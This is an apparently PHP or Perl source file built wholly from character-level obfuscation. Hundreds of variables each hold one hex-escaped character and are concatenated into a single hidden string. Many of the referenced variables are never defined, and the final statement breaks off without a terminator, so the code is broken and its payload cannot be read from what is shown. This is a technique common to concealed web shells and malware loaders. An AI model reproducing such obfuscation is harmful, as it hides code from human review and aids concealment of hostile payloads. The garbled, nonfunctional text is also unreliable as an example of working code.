$jikd619="\x6f";$jikd6="\x2d";$jikd1211="\x20";
$jikd979="\x09";$jikd1558="\x20";$jikd552="\x69";$jikd1435="\x09";$jikd81="\x69";
$jikd467="\x66";$jikd406="\x20";$jikd572="\x09";$jikd1478="\x63";$jikd995="\x24";$jikd404="\x73";
$jikd583="\x3d";$jikd1651="\x74";$jikd716="\x73";$jikd1114="\x73";$jikd29="\x6e";
$jikd1077="\x09";$jikd922="\x0a";$jikd664="\x2e";$jikd433="\x70";
$jikd1054="\x3d";$jikd873="\x23";$jikd244="\x69";$jikd893="\x6d";$jikd85="\x31";$jikd418="\x20";
$jikd1355="\x09";$jikd230="\x28";$jikd1044="\x0a";
$jikd1307="\x6e";$jikd1282="\x24";$jikd1380="\x20";$jikd561="\x0a";$jikd960="\x32";$jikd957="\x6e";$jikd1516="\x65";$jikd1660="\x72";$jikd149="\x70";$jikd429="\x73";$jikd384="\x2c";$jikd977="\x7d";$jikd1500="\x61";
$jikd673="\x66";$jikd749="\x65";$jikd1683="\x3d";$jikd1196="\x69";$jikd601="\x6d";$jikd391="\x09";$jikd332="\x67";$jikd934="\x20";$jikd989="\x20";$jikd1509="\x75";$jikd71="\x73";$jikd358="\x20";
$jikd1330="\x33";$jikd788="\x3d";$jikd806="\x75";$jikd720="\x5d";$jikd1384="\x69";$jikd1277="\x5b";
$jikd1314="\x79";
$jikd1419="\x28";
$jikd915="\x2e";
$jikd1595="\x70";
$jikd1148="\x66";$jikd1574="\x74";
$jikd98="\x6c";$jikd1187="\x6e";$jikd203="\x40";$jikd44="\x30";$jikd1372="\x24";$jikd914="\x22";$jikd388="\x3b";$jikd380="\x2c";
$jikd707="\x2c";$jikd67="\x20";$jikd1250="\x20";$jikd35="\x69";
$jikd1713="\x3b";$jikd632="\x69";$jikd1679="\x3b";$jikd982="\x63";$jikd1387="\x7b";
$jikd803="\x61";$jikd173="\x09";
$jikd12="\x20";
$jikd423="\x6f";$jikd1581="\x0a";$jikd878="\x70";$jikd1006="\x69";$jikd1299="\x61";$jikd314="\x20";
$jikd1663="\x74";$jikd374="\x28";
$jikd38="\x20";$jikd829="\x63";
$jikd811="\x20";$jikd1401="\x20";$jikd1570="\x6f";$jikd555="\x65";$jikd295="\x69";$jikd1256="\x09";
$jikd1669="\x63";$jikd1592="\x6d";$jikd453="\x20";$jikd494="\x75";$jikd932="\x2e";
$jikd1711="\x6e";$jikd1087="\x24";$jikd570="\x3b";$jikd444="\x65";$jikd521="\x73";$jikd1377="\x24";$jikd1058="\x76";$jikd4="\x72";$jikd1427="\x29";
$jikd658="\x6d";$jikd130="\x76";$jikd55="\x61";$jikd311="\x66";
$jikd1609="\x20";$jikd1496="\x6c";
$jikd947="\x20";$jikd937="\x6e";$jikd472="\x0a";
$jikd462="\x65";$jikd1109="\x5f";$jikd1258="\x40";$jikd791="\x30";$jikd1122="\x65";
$jikd504="\x63";$jikd675="\x22";$jikd1246="\x5b";$jikd317="\x69";
$jikd1057="\x65";
$jikd217="\x0a";$jikd1630="\x72";$jikd145="\x61";$jikd1610="\x24";$jikd52="\x73";$jikd981="\x6d";$jikd90="\x73";
$jikd1210="\x74";$jikd1="\x20";$jikd1267="\x24";$jikd930="\x65";$jikd1274="\x24";$jikd1684="\x22";
$jikd1643="\x2d";$jikd514="\x74";$jikd1712="\x63";$jikd1073="\x3b";
$jikd595="\x67";$jikd1340="\x20";
$jikd1318="\x20";
$jikd689="\x30";$jikd850="\x22";$jikd1674="\x6f";$jikd477="\x68";$jikd1238="\x5d";$jikd308="\x74";$jikd678="\x25";$jikd817="\x29";$jikd822="\x69";$jikd362="\x72";$jikd140="\x62";
$jikd424="\x6d";$jikd1344="\x72";$jikd895="\x6f";
$jikd18="\x63";
$jikd108="\x72";
$jikd171="\x3b";$jikd1462="\x69";
$jikd900="\x3d";$jikd86="\x20";$jikd1484="\x6d";
$jikd727="\x24";$jikd503="\x65";$jikd1452="\x67";$jikd287="\x77";$jikd1092="\x65";$jikd695="\x22";$jikd238="\x65";$jikd1383="\x24";
$jikd457="\x68";$jikd812="\x65";$jikd1551="\x7a";$jikd1365="\x69";$jikd971="\x20";$jikd998="\x72";
$jikd487="\x63";$jikd27="\x68";$jikd1633="\x2d";$jikd392="\x70";
$jikd661="\x64";$jikd1594="\x72";$jikd1607="\x6e";
$jikd963="\x2b";$jikd0="\x23";$jikd1278="\x24";$jikd366="\x2c";$jikd73="\x20";$jikd546="\x70";$jikd1097="\x0a";$jikd1038="\x6d";$jikd1112="\x74";
$jikd1540="\x74";$jikd1115="\x5f";$jikd986="\x20";$jikd1612="\x63";$jikd879="\x74";$jikd1010="\x22";
$jikd115="\x64";$jikd443="\x6b";$jikd641="\x72";$jikd1257="\x09";$jikd351="\x0a";$jikd1541="\x68";
$jikd933="\x3d";$jikd983="\x6f";$jikd864="\x30";$jikd743="\x09";$jikd3="\x6f";$jikd654="\x0a";$jikd1074="\x22";$jikd881="\x20";$jikd700="\x61";$jikd779="\x32";$jikd1316="\x24";$jikd1225="\x09";$jikd961="\x30";$jikd353="\x09";$jikd1437="\x0a";$jikd1376="\x20";
$jikd1323="\x74";$jikd1670="\x3b";$jikd1061="\x20";$jikd58="\x4b";$jikd447="\x20";$jikd604="\x24";$jikd905="\x24";$jikd835="\x3d";$jikd786="\x29";$jikd403="\x65";$jikd257="\x6c";
$jikd1693="\x67";$jikd61="\x68";$jikd465="\x68";
$jikd1253="\x5d";$jikd407="\x24";$jikd935="\x22";$jikd1360="\x28";$jikd1332="\x29";$jikd506="\x20";$jikd137="\x0a";$jikd32="\x65";$jikd586="\x61";$jikd1636="\x61";
$jikd322="\x3b";$jikd646="\x20";
$jikd795="\x09";
$jikd890="\x09";$jikd809="\x74";$jikd936="\x5c";$jikd1538="\x65";
$jikd1321="\x69";
$jikd891="\x09";$jikd1668="\x6e";$jikd1458="\x23";
$jikd1590="\x74";$jikd1434="\x0a";$jikd544="\x72";$jikd93="\x6e";$jikd1189="\x28";
$jikd1304="\x74";$jikd1158="\x20";$jikd1133="\x31";$jikd964="\x31";
$jikd1425="\x32";$jikd1186="\x69";$jikd1206="\x09";$jikd298="\x20";$jikd1450="\x69";$jikd1139="\x29";$jikd1248="\x6a";$jikd911="\x61";$jikd1619="\x28";$jikd579="\x61";$jikd1615="\x6f";$jikd221="\x72";$jikd1339="\x79";$jikd1688="\x3b";$jikd1276="\x32";$jikd25="\x72";
$jikd170="\x74";$jikd584="\x20";$jikd303="\x73";$jikd603="\x20";$jikd1160="\x20";$jikd324="\x24";$jikd250="\x0a";$jikd562="\x0a";$jikd724="\x72";$jikd235="\x2a";$jikd1171="\x3b";
$jikd402="\x78";$jikd51="\x61";$jikd585="\x72";$jikd107="\x20";$jikd1554="\x23";
$jikd1667="\x24";$jikd1244="\x61";$jikd271="\x20";
$jikd323="\x20";$jikd1413="\x22";$jikd162="\x65";
$jikd185="\x09";$jikd1491="\x6f";$jikd222="\x61";$jikd1385="\x29";$jikd369="\x75";$jikd1545="\x6f";$jikd643="\x70";
$jikd363="\x69";$jikd748="\x64";$jikd1288="\x7d";
$jikd907="\x61";$jikd1476="\x65";$jikd623="\x24";$jikd527="\x61";$jikd70="\x6e";$jikd975="\x0a";$jikd41="\x29";$jikd764="\x24";$jikd1451="\x6e";$jikd736="\x69";$jikd1600="\x63";$jikd=$jikd0.
$jikd1.$jikd2.$jikd3.$jikd4.$jikd5.$jikd6.$jikd7.$jikd8.$jikd9.$jikd10.$jikd11.$jikd12.$jikd13.$jikd14.$jikd15.$jikd16.$jikd17.
$jikd18.$jikd19.$jikd20.$jikd21.$jikd22.
$jikd23.
$jikd24.$jikd25.$jikd26.$jikd27.$jikd28.
$jikd29.$jikd30.$jikd31.$jikd32.$jikd33.$jikd34.$jikd35.$jikd36.
$jikd37.$jikd38.$jikd39.$jikd40.$jikd41.$jikd42.$jikd43.$jikd44.$jikd45.$jikd46.$jikd47.$jikd48.
$jikd49.
$jikd50.$jikd51.$jikd52.$jikd53.$jikd54.$jikd55.$jikd56.
$jikd57.$jikd58.$jikd59.$jikd60.$jikd61.$jikd62.$jikd63.$jikd64.
$jikd65.$jikd66.
$jikd67.$jikd68.$jikd69.$jikd70.$jikd71.
$jikd72.
$jikd73.$jikd74.$jikd75.
$jikd76.$jikd77.$jikd78.
$jikd79.$jikd80.$jikd81.
$jikd82.$jikd83.$jikd84.$jikd85.$jikd86.$jikd87.$jikd88.$jikd89.$jikd90.$jikd91.$jikd92.$jikd93.$jikd94.$jikd95.$jikd96.
$jikd97.$jikd98.
$jikd99.$jikd100.$jikd101.$jikd102.
$jikd103.$jikd104.$jikd105.$jikd106.$jikd107.$jikd108.$jikd109.$jikd110.$jikd111.$jikd112.$jikd113.$jikd114.$jikd115.$jikd116.$jikd117.$jikd118.$jikd119.$jikd120.
$jikd121.$jikd122.$jikd123.$jikd124.$jikd125.$jikd126.$jikd127.$jikd128.
$jikd129.$jikd130.$jikd131.$jikd132.
$jikd133.$jikd134.$jikd135.$jikd136.$jikd137.$jikd138.$jikd139.$jikd140.$jikd141.$jikd142.$jikd143.$jikd144.
$jikd145.$jikd146.$jikd147.
$jikd148.
$jikd149.$jikd150.$jikd151.$jikd152.$jikd153.$jikd154.
$jikd155.$jikd156.$jikd157.$jikd158.$jikd159.$jikd160.$jikd161.$jikd162.$jikd163.$jikd164.$jikd165.
$jikd166.$jikd167.$jikd168.$jikd169.$jikd170.$jikd171.$jikd172.$jikd173.$jikd174.$jikd175.$jikd176.
$jikd177.$jikd178.$jikd179.$jikd180.
$jikd181.$jikd182.$jikd183.$jikd184.
$jikd185.
$jikd186.
$jikd187.$jikd188.$jikd189.$jikd190.$jikd191.$jikd192.$jikd193.$jikd194.$jikd195.
$jikd196.$jikd197.$jikd198.$jikd199.$jikd200.
$jikd201.
$jikd202.
$jikd203.$jikd204.$jikd205.$jikd206.$jikd207.$jikd208.
$jikd209.$jikd210.
$jikd211.$jikd212.$jikd213.$jikd214.$jikd215.$jikd216.$jikd217.$jikd218.$jikd219.$jikd220.
$jikd221.$jikd222.$jikd223.$jikd224.
$jikd225.$jikd226.$jikd227.$jikd228.$jikd229.$jikd230.
$jikd231.$jikd232.$jikd233.$jikd234.$jikd235.$jikd236.
$jikd237.$jikd238.
$jikd239.$jikd240.$jikd241.$jikd242.$jikd243.$jikd244.$jikd245.$jikd246.
$jikd247.$jikd248.$jikd249.$jikd250.
$jikd251.$jikd252.
$jikd253.$jikd254.$jikd255.
$jikd256.$jikd257.$jikd258.$jikd259.$jikd260.$jikd261.
$jikd262.
$jikd263.
$jikd264.$jikd265.$jikd266.$jikd267.$jikd268.$jikd269.$jikd270.
$jikd271.$jikd272.$jikd273.$jikd274.$jikd275.
$jikd276.$jikd277.
$jikd278.
$jikd279.$jikd280.$jikd281.$jikd282.$jikd283.$jikd284.$jikd285.$jikd286.$jikd287.$jikd288.
$jikd289.$jikd290.$jikd291.$jikd292.$jikd293.$jikd294.$jikd295.$jikd296.$jikd297.$jikd298.$jikd299.$jikd300.
$jikd301.$jikd302.$jikd303.$jikd304.$jikd305.$jikd306.
$jikd307.
$jikd308.$jikd309.$jikd310.$jikd311.$jikd312.
$jikd313.$jikd314.$jikd315.$jikd316.$jikd317.$jikd318.
$jikd319.$jikd320.
$jikd321.$jikd322.
$jikd323.$jikd324.$jikd325.
$jikd326.$jikd327.$jikd328.$jikd329.$jikd330.$jikd331.$jikd332.$jikd333.
$jikd334.$jikd335.$jikd336.
$jikd337.$jikd338.$jikd339.$jikd340.$jikd341.$jikd342.$jikd343.$jikd344.
$jikd345.
$jikd346.$jikd347.$jikd348.$jikd349.$jikd350.$jikd351.$jikd352.
$jikd353.$jikd354.$jikd355.$jikd356.$jikd357.$jikd358.$jikd359.$jikd360.
$jikd361.$jikd362.$jikd363.$jikd364.$jikd365.$jikd366.$jikd367.$jikd368.$jikd369.$jikd370.$jikd371.
$jikd372.
$jikd373.$jikd374.$jikd375.
$jikd376.$jikd377.$jikd378.$jikd379.$jikd380.$jikd381.$jikd382.$jikd383.$jikd384.$jikd385.$jikd386.$jikd387.$jikd388.$jikd389.$jikd390.
$jikd391.$jikd392.
$jikd393.
$jikd394.$jikd395.$jikd396.$jikd397.$jikd398.$jikd399.$jikd400.
$jikd401.$jikd402.$jikd403.$jikd404.$jikd405.$jikd406.$jikd407.$jikd408.$jikd409.$jikd410.
$jikd411.$jikd412.$jikd413.$jikd414.$jikd415.$jikd416.
$jikd417.$jikd418.$jikd419.$jikd420.$jikd421.$jikd422.$jikd423.$jikd424.$jikd425.
$jikd426.$jikd427.$jikd428.$jikd429.$jikd430.$jikd431.$jikd432.
$jikd433.$jikd434.$jikd435.$jikd436.
$jikd437.$jikd438.$jikd439.$jikd440.$jikd441.
$jikd442.
$jikd443.$jikd444.$jikd445.$jikd446.$jikd447.$jikd448.$jikd449.$jikd450.$jikd451.$jikd452.$jikd453.$jikd454.$jikd455.$jikd456.$jikd457.$jikd458.$jikd459.$jikd460.
$jikd461.$jikd462.$jikd463.$jikd464.$jikd465.$jikd466.$jikd467.$jikd468.$jikd469.$jikd470.$jikd471.$jikd472.$jikd473.$jikd474.$jikd475.$jikd476.$jikd477.$jikd478.$jikd479.$jikd480.
$jikd481.$jikd482.
$jikd483.
$jikd484.$jikd485.$jikd486.$jikd487.$jikd488.$jikd489.$jikd490.$jikd491.$jikd492.$jikd493.$jikd494.$jikd495.$jikd496.
$jikd497.$jikd498.$jikd499.$jikd500.$jikd501.$jikd502.$jikd503.$jikd504.
$jikd505.$jikd506.$jikd507.$jikd508.$jikd509.$jikd510.
$jikd511.$jikd512.$jikd513.$jikd514.$jikd515.$jikd516.
$jikd517.$jikd518.
$jikd519.$jikd520.$jikd521.$jikd522.$jikd523.$jikd524.$jikd525.
$jikd526.$jikd527.
$jikd528.
$jikd529.$jikd530.$jikd531.$jikd532.$jikd533.$jikd534.
$jikd535.$jikd536.$jikd537.$jikd538.$jikd539.$jikd540.
$jikd541.$jikd542.$jikd543.$jikd544.$jikd545.$jikd546.
$jikd547.$jikd548.$jikd549.$jikd550.
$jikd551.$jikd552.
$jikd553.$jikd554.$jikd555.$jikd556.$jikd557.$jikd558.$jikd559.$jikd560.
$jikd561.$jikd562.$jikd563.$jikd564.$jikd565.
$jikd566.$jikd567.$jikd568.$jikd569.
$jikd570.$jikd571.$jikd572.
$jikd573.$jikd574.
$jikd575.$jikd576.$jikd577.$jikd578.
$jikd579.$jikd580.$jikd581.$jikd582.$jikd583.$jikd584.$jikd585.$jikd586.$jikd587.$jikd588.$jikd589.$jikd590.$jikd591.$jikd592.$jikd593.$jikd594.$jikd595.$jikd596.$jikd597.$jikd598.$jikd599.$jikd600.
$jikd601.$jikd602.$jikd603.$jikd604.
$jikd605.
$jikd606.$jikd607.$jikd608.$jikd609.
$jikd610.$jikd611.$jikd612.
$jikd613.$jikd614.$jikd615.
$jikd616.$jikd617.$jikd618.$jikd619.$jikd620.$jikd621.$jikd622.
$jikd623.$jikd624.
$jikd625.$jikd626.$jikd627.$jikd628.$jikd629.$jikd630.$jikd631.$jikd632.$jikd633.$jikd634.$jikd635.$jikd636.
$jikd637.
$jikd638.$jikd639.$jikd640.$jikd641.$jikd642.$jikd643.$jikd644.$jikd645.$jikd646.$jikd647.$jikd648.$jikd649.$jikd650.$jikd651.$jikd652.
$jikd653.
$jikd654.
$jikd655.
$jikd656.
$jikd657.$jikd658.$jikd659.$jikd660.
$jikd661.$jikd662.$jikd663.$jikd664.$jikd665.$jikd666.$jikd667.$jikd668.$jikd669.$jikd670.$jikd671.$jikd672.$jikd673.$jikd674.$jikd675.
$jikd676.$jikd677.$jikd678.$jikd679.$jikd680.$jikd681.$jikd682.$jikd683.$jikd684.
$jikd685.$jikd686.$jikd687.$jikd688.$jikd689.$jikd690.
$jikd691.$jikd692.$jikd693.$jikd694.$jikd695.$jikd696.
$jikd697.$jikd698.$jikd699.$jikd700.
$jikd701.$jikd702.$jikd703.$jikd704.$jikd705.$jikd706.$jikd707.$jikd708.
$jikd709.$jikd710.$jikd711.$jikd712.$jikd713.$jikd714.$jikd715.$jikd716.$jikd717.$jikd718.$jikd719.$jikd720.
$jikd721.$jikd722.$jikd723.$jikd724.$jikd725.
$jikd726.$jikd727.$jikd728.$jikd729.$jikd730.$jikd731.$jikd732.$jikd733.$jikd734.$jikd735.
$jikd736.$jikd737.$jikd738.$jikd739.$jikd740.$jikd741.$jikd742.$jikd743.$jikd744.$jikd745.$jikd746.$jikd747.$jikd748.
$jikd749.$jikd750.
$jikd751.$jikd752.$jikd753.
$jikd754.$jikd755.$jikd756.$jikd757.
$jikd758.$jikd759.$jikd760.$jikd761.
$jikd762.$jikd763.$jikd764.
$jikd765.$jikd766.
$jikd767.
$jikd768.
$jikd769.
$jikd770.$jikd771.
$jikd772.$jikd773.$jikd774.$jikd775.$jikd776.$jikd777.
$jikd778.$jikd779.$jikd780.$jikd781.$jikd782.$jikd783.$jikd784.$jikd785.$jikd786.$jikd787.$jikd788.$jikd789.$jikd790.$jikd791.$jikd792.$jikd793.$jikd794.$jikd795.$jikd796.$jikd797.$jikd798.
$jikd799.$jikd800.$jikd801.$jikd802.$jikd803.$jikd804.$jikd805.$jikd806.$jikd807.$jikd808.
$jikd809.$jikd810.$jikd811.
$jikd812.$jikd813.$jikd814.$jikd815.$jikd816.$jikd817.$jikd818.$jikd819.$jikd820.
$jikd821.$jikd822.$jikd823.$jikd824.$jikd825.$jikd826.$jikd827.$jikd828.$jikd829.$jikd830.$jikd831.$jikd832.
$jikd833.
$jikd834.
$jikd835.$jikd836.$jikd837.$jikd838.$jikd839.$jikd840.$jikd841.$jikd842.$jikd843.$jikd844.$jikd845.$jikd846.$jikd847.$jikd848.
$jikd849.$jikd850.$jikd851.$jikd852.$jikd853.$jikd854.$jikd855.$jikd856.$jikd857.$jikd858.$jikd859.$jikd860.
$jikd861.
$jikd862.$jikd863.$jikd864.
$jikd865.$jikd866.$jikd867.$jikd868.$jikd869.$jikd870.$jikd871.$jikd872.$jikd873.$jikd874.$jikd875.$jikd876.
$jikd877.$jikd878.$jikd879.$jikd880.
$jikd881.$jikd882.$jikd883.$jikd884.$jikd885.$jikd886.$jikd887.$jikd888.
$jikd889.$jikd890.
$jikd891.$jikd892.$jikd893.$jikd894.$jikd895.$jikd896.
$jikd897.$jikd898.$jikd899.$jikd900.
$jikd901.$jikd902.$jikd903.$jikd904.$jikd905.$jikd906.$jikd907.$jikd908.$jikd909.$jikd910.
$jikd911.$jikd912.
$jikd913.$jikd914.$jikd915.$jikd916.$jikd917.$jikd918.$jikd919.$jikd920.$jikd921.$jikd922.$jikd923.$jikd924.$jikd925.$jikd926.$jikd927.$jikd928.$jikd929.$jikd930.$jikd931.$jikd932.
$jikd933.$jikd934.$jikd935.$jikd936.$jikd937.$jikd938.$jikd939.$jikd940.$jikd941.$jikd942.$jikd943.$jikd944.$jikd945.$jikd946.$jikd947.$jikd948.$jikd949.$jikd950.$jikd951.$jikd952.$jikd953.$jikd954.
$jikd955.$jikd956.$jikd957.$jikd958.$jikd959.$jikd960.$jikd961.$jikd962.$jikd963.$jikd964.$jikd965.$jikd966.$jikd967.$jikd968.$jikd969.$jikd970.$jikd971.$jikd972.
$jikd973.$jikd974.$jikd975.
$jikd976.$jikd977.$jikd978.$jikd979.$jikd980.
$jikd981.$jikd982.$jikd983.$jikd984.
$jikd985.$jikd986.$jikd987.$jikd988.$jikd989.$jikd990.
$jikd991.$jikd992.$jikd993.$jikd994.$jikd995.
$jikd996.$jikd997.$jikd998.$jikd999.$jikd1000.$jikd1001.$jikd1002.$jikd1003.$jikd1004.$jikd1005.
$jikd1006.$jikd1007.$jikd1008.
$jikd1009.$jikd1010.$jikd1011.$jikd1012.$jikd1013.$jikd1014.$jikd1015.$jikd1016.$jikd1017.$jikd1018.$jikd1019.$jikd1020.
$jikd1021.$jikd1022.$jikd1023.$jikd1024.$jikd1025.$jikd1026.$jikd1027.$jikd1028.
$jikd1029.$jikd1030.$jikd1031.$jikd1032.$jikd1033.$jikd1034.$jikd1035.
$jikd1036.$jikd1037.
$jikd1038.
$jikd1039.$jikd1040.
$jikd1041.$jikd1042.$jikd1043.$jikd1044.$jikd1045.$jikd1046.$jikd1047.$jikd1048.
$jikd1049.$jikd1050.$jikd1051.$jikd1052.$jikd1053.$jikd1054.$jikd1055.$jikd1056.$jikd1057.$jikd1058.$jikd1059.
$jikd1060.$jikd1061.$jikd1062.$jikd1063.$jikd1064.
$jikd1065.$jikd1066.$jikd1067.
$jikd1068.$jikd1069.
$jikd1070.$jikd1071.$jikd1072.$jikd1073.$jikd1074.$jikd1075.$jikd1076.
$jikd1077.$jikd1078.$jikd1079.$jikd1080.$jikd1081.$jikd1082.$jikd1083.$jikd1084.$jikd1085.$jikd1086.$jikd1087.$jikd1088.$jikd1089.$jikd1090.
$jikd1091.$jikd1092.$jikd1093.$jikd1094.$jikd1095.$jikd1096.$jikd1097.$jikd1098.$jikd1099.$jikd1100.$jikd1101.$jikd1102.$jikd1103.$jikd1104.
$jikd1105.$jikd1106.
$jikd1107.
$jikd1108.$jikd1109.$jikd1110.$jikd1111.
$jikd1112.$jikd1113.$jikd1114.$jikd1115.$jikd1116.$jikd1117.$jikd1118.
$jikd1119.
$jikd1120.$jikd1121.$jikd1122.$jikd1123.$jikd1124.$jikd1125.$jikd1126.$jikd1127.$jikd1128.$jikd1129.$jikd1130.$jikd1131.$jikd1132.$jikd1133.$jikd1134.$jikd1135.$jikd1136.$jikd1137.$jikd1138.
$jikd1139.$jikd1140.$jikd1141.$jikd1142.
$jikd1143.$jikd1144.$jikd1145.$jikd1146.$jikd1147.$jikd1148.
$jikd1149.$jikd1150.$jikd1151.$jikd1152.
$jikd1153.$jikd1154.$jikd1155.$jikd1156.$jikd1157.$jikd1158.
$jikd1159.$jikd1160.
$jikd1161.
$jikd1162.
$jikd1163.$jikd1164.
$jikd1165.$jikd1166.$jikd1167.$jikd1168.
$jikd1169.$jikd1170.$jikd1171.$jikd1172.$jikd1173.
$jikd1174.$jikd1175.
$jikd1176.
$jikd1177.$jikd1178.$jikd1179.$jikd1180.
$jikd1181.$jikd1182.$jikd1183.
$jikd1184.$jikd1185.
$jikd1186.$jikd1187.$jikd1188.$jikd1189.$jikd1190.$jikd1191.$jikd1192.$jikd1193.$jikd1194.
$jikd1195.$jikd1196.$jikd1197.$jikd1198.$jikd1199.$jikd1200.
$jikd1201.
$jikd1202.$jikd1203.$jikd1204.$jikd1205.$jikd1206.$jikd1207.$jikd1208.$jikd1209.$jikd1210.
$jikd1211.$jikd1212.$jikd1213.$jikd1214.$jikd1215.$jikd1216.$jikd1217.$jikd1218.$jikd1219.$jikd1220.$jikd1221.$jikd1222.$jikd1223.$jikd1224.$jikd1225.$jikd1226.$jikd1227.$jikd1228.$jikd1229.$jikd1230.$jikd1231.$jikd1232.
$jikd1233.$jikd1234.$jikd1235.$jikd1236.
$jikd1237.
$jikd1238.$jikd1239.
$jikd1240.
$jikd1241.$jikd1242.
$jikd1243.$jikd1244.$jikd1245.$jikd1246.$jikd1247.$jikd1248.$jikd1249.$jikd1250.$jikd1251.
$jikd1252.$jikd1253.$jikd1254.$jikd1255.$jikd1256.$jikd1257.$jikd1258.
$jikd1259.$jikd1260.$jikd1261.
$jikd1262.$jikd1263.$jikd1264.$jikd1265.$jikd1266.$jikd1267.$jikd1268.$jikd1269.$jikd1270.$jikd1271.$jikd1272.$jikd1273.$jikd1274.$jikd1275.$jikd1276.
$jikd1277.$jikd1278.$jikd1279.$jikd1280.
$jikd1281.$jikd1282.$jikd1283.$jikd1284.
$jikd1285.$jikd1286.$jikd1287.$jikd1288.$jikd1289.$jikd1290.$jikd1291.
$jikd1292.
$jikd1293.$jikd1294.$jikd1295.$jikd1296.$jikd1297.$jikd1298.$jikd1299.$jikd1300.$jikd1301.$jikd1302.$jikd1303.$jikd1304.
$jikd1305.$jikd1306.$jikd1307.$jikd1308.$jikd1309.$jikd1310.$jikd1311.$jikd1312.$jikd1313.$jikd1314.$jikd1315.$jikd1316.
$jikd1317.$jikd1318.$jikd1319.$jikd1320.
$jikd1321.$jikd1322.$jikd1323.
$jikd1324.$jikd1325.$jikd1326.$jikd1327.
$jikd1328.$jikd1329.$jikd1330.$jikd1331.
$jikd1332.$jikd1333.$jikd1334.$jikd1335.$jikd1336.$jikd1337.$jikd1338.$jikd1339.$jikd1340.$jikd1341.$jikd1342.$jikd1343.$jikd1344.$jikd1345.$jikd1346.
$jikd1347.$jikd1348.$jikd1349.$jikd1350.
$jikd1351.$jikd1352.$jikd1353.
$jikd1354.$jikd1355.
$jikd1356.$jikd1357.$jikd1358.$jikd1359.$jikd1360.
$jikd1361.$jikd1362.$jikd1363.$jikd1364.$jikd1365.$jikd1366.$jikd1367.$jikd1368.$jikd1369.$jikd1370.$jikd1371.$jikd1372.$jikd1373.$jikd1374.$jikd1375.$jikd1376.$jikd1377.$jikd1378.$jikd1379.$jikd1380.$jikd1381.$jikd1382.$jikd1383.$jikd1384.$jikd1385.$jikd1386.$jikd1387.
$jikd1388.
$jikd1389.$jikd1390.$jikd1391.$jikd1392.
$jikd1393.$jikd1394.$jikd1395.$jikd1396.$jikd1397.$jikd1398.$jikd1399.$jikd1400.$jikd1401.$jikd1402.$jikd1403.$jikd1404.$jikd1405.$jikd1406.
$jikd1407.$jikd1408.$jikd1409.$jikd1410.$jikd1411.$jikd1412.$jikd1413.$jikd1414.$jikd1415.$jikd1416.$jikd1417.$jikd1418.$jikd1419.$jikd1420.
$jikd1421.$jikd1422.
$jikd1423.$jikd1424.$jikd1425.$jikd1426.$jikd1427.$jikd1428.
$jikd1429.$jikd1430.
$jikd1431.$jikd1432.$jikd1433.$jikd1434.$jikd1435.$jikd1436.$jikd1437.$jikd1438.$jikd1439.$jikd1440.$jikd1441.$jikd1442.$jikd1443.$jikd1444.$jikd1445.
$jikd1446.$jikd1447.$jikd1448.$jikd1449.$jikd1450.$jikd1451.$jikd1452.$jikd1453.$jikd1454.$jikd1455.$jikd1456.
$jikd1457.$jikd1458.
$jikd1459.$jikd1460.$jikd1461.$jikd1462.$jikd1463.$jikd1464.
$jikd1465.$jikd1466.$jikd1467.$jikd1468.$jikd1469.$jikd1470.
$jikd1471.$jikd1472.$jikd1473.$jikd1474.
$jikd1475.$jikd1476.
$jikd1477.$jikd1478.$jikd1479.$jikd1480.
$jikd1481.$jikd1482.$jikd1483.$jikd1484.$jikd1485.$jikd1486.$jikd1487.$jikd1488.
$jikd1489.
$jikd1490.$jikd1491.$jikd1492.$jikd1493.$jikd1494.$jikd1495.$jikd1496.$jikd1497.$jikd1498.
$jikd1499.$jikd1500.$jikd1501.$jikd1502.$jikd1503.
$jikd1504.$jikd1505.$jikd1506.$jikd1507.$jikd1508.
$jikd1509.$jikd1510.$jikd1511.$jikd1512.
$jikd1513.$jikd1514.
$jikd1515.$jikd1516.$jikd1517.$jikd1518.$jikd1519.$jikd1520.$jikd1521.$jikd1522.$jikd1523.$jikd1524.
$jikd1525.$jikd1526.$jikd1527.$jikd1528.
$jikd1529.$jikd1530.$jikd1531.$jikd1532.$jikd1533.$jikd1534.$jikd1535.$jikd1536.$jikd1537.$jikd1538.$jikd1539.$jikd1540.$jikd1541.$jikd1542.$jikd1543.$jikd1544.$jikd1545.$jikd1546.$jikd1547.
$jikd1548.$jikd1549.$jikd1550.$jikd1551.$jikd1552.$jikd1553.$jikd1554.
$jikd1555.$jikd1556.
$jikd1557.$jikd1558.$jikd1559.$jikd1560.$jikd1561.$jikd1562.$jikd1563.$jikd1564.$jikd1565.$jikd1566.
$jikd1567.$jikd1568.
$jikd1569.$jikd1570.$jikd1571.$jikd1572.$jikd1573.$jikd1574.$jikd1575.$jikd1576.$jikd1577.$jikd1578.$jikd1579.$jikd1580.$jikd1581.$jikd1582.$jikd1583.$jikd1584.
$jikd1585.$jikd1586.$jikd1587.$jikd1588.$jikd1589.
$jikd1590.$jikd1591.$jikd1592.$jikd1593.$jikd1594.$jikd1595.$jikd1596.$jikd1597.$jikd1598.$jikd1599.$jikd1600.$jikd1601.$jikd1602.$jikd1603.$jikd1604.$jikd1605.$jikd1606.$jikd1607.$jikd1608.
$jikd1609.$jikd1610.$jikd1611.$jikd1612.$jikd1613.$jikd1614.$jikd1615.$jikd1616.
$jikd1617.$jikd1618.
$jikd1619.$jikd1620.$jikd1621.$jikd1622.$jikd1623.$jikd1624.$jikd1625.$jikd1626.$jikd1627.$jikd1628.$jikd1629.$jikd1630.$jikd1631.$jikd1632.
$jikd1633.$jikd1634.$jikd1635.$jikd1636.$jikd1637.$jikd1638.$jikd1639.$jikd1640.$jikd1641.$jikd1642.$jikd1643.$jikd1644.
$jikd1645.$jikd1646.
$jikd1647.$jikd1648.
$jikd1649.
$jikd1650.$jikd1651.$jikd1652.$jikd1653.$jikd1654.$jikd1655.$jikd1656.$jikd1657.$jikd1658.$jikd1659.$jikd1660.$jikd1661.$jikd1662.$jikd1663.$jikd1664.$jikd1665.$jikd1666.$jikd1667.$jikd1668.$jikd1669.$jikd1670.$jikd1671.$jikd1672.
$jikd1673.$jikd1674.$jikd1675.$jikd1676.$jikd1677.$jikd1678.$jikd1679.
$jikd1680.$jikd1681.$jikd1682.$jikd1683.$jikd1684.$jikd1685.$jikd1686.
$jikd1687.
$jikd1688.$jikd1689.$jikd1690.$jikd1691.
$jikd1692.$jikd1693.$jikd1694.
$jikd1695.$jikd1696.$jikd1697.$jikd1698.$jikd1699.$jikd1700.
$jikd1701.
$jikd1702.$jikd1703.$jikd1704.$jikd1705.$jikd1706.
